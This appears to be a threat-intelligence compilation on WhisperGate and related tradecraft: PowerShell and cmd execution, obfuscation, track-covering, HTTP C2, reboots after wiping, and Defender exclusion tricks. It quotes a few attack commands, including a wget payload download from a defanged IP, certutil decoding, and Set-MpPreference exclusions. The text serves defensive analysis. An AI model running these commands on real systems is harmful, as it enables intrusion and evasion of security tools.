WhisperGate

The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."

During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.

The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.

Examples throughout the content include deleting tools, logs, malware-related files, staged archives, screenshots, temporary files, and exfiltrated data 'to cover their tracks,' 'reduce their footprint,' 'remove traces of activity,' or as part of 'post-intrusion cleanup.'

The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.

The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'

Alternatively, they may add new directories to an EDR tool’s exclusion list, enabling them to hide malicious files via File/Path Exclusions.

"4H RAT sends an OS version identifier in its beacons"; "admin@338 actors used ... ver ... systeminfo"; "Bundlore will enumerate the macOS version ... using /usr/bin/sw_vers -productVersion"; "DarkTortilla ... querying ... WMI objects"; "Turla ... discover operating system configuration details using the systeminfo and set commands"

“3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory… admin@338 actors used… dir c:\ >> %temp%\download … APT28 has used Forfiles to locate PDF, Excel, and Word documents…”

The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.

Examples include: 'APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits,' 'APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads,' and many malware families used HTTP GET/POST or HTTPS to download additional payloads or files.

Following Russia’s invasion of Ukraine on 24 February 2022, likely Russian threat actors conducted several disruptive and destructive computer network attacks against Ukrainian targets... To date, there are eight tracked malware families that Russia-linked cyber threat actors have used for destructive activity against Ukraine: WhisperGate/Whisperkill, FoxBlade (HermeticWiper), SonicVote (HermeticRansom), CaddyWiper, DesertBlade, Industroyer2, Lasainraw (IsaacWiper) and FiberLake (DoubleZero).

"AcidPour includes functionality to reboot the victim system following wiping actions..."; "AcidRain reboots the target system once the various wiping processes are complete"; "Apostle reboots the victim machine following wiping"; "APT37 ... issue the command shutdown /r /t 1 to reboot a system after wiping its MBR"; "APT38 ... BOOTWRECK ... initiate a system reboot after wiping the victim's MBR"; "Black Basta ... used ShellExecuteA to shut down and restart"; "DarkGate ... used the shutdown command"; "HermeticWiper can initiate a system shutdown"; "NotPetya will reboot the system one hour after infection"; "Shamoon will reboot the infected system once the wiping functionality has been completed"; "WhisperGate can shutdown ... through ... ExitWindowsEx"

"Play has used Base64-encoded PowerShell scripts to disable Microsoft Defender," "StrongPity can use PowerShell to add files to the Windows Defender exclusions list," and "ZeroCleare can use a malicious PowerShell script to bypass Windows controls."

Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities... killing security software processes or services, modifying / deleting Registry keys or configuration files... Adversaries may also disable updates...

BlackByte Ransomware 'adds .JS and .EXE extensions to the Microsoft Defender exclusion list'; PureCrypter 'executed Set-MpPreference -ExclusionPath'; QakBot 'modify the Registry to add its binaries to the Windows Defender exclusion list'; Raspberry Robin 'add an exception to Microsoft Defender that excludes the entire main drive'; StrongPity 'add directories used by the malware to the Windows Defender exclusions list'; XLoader 'can add the path of its executable to the Microsoft Defender exclusion list'; ZIPLINE 'can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool.'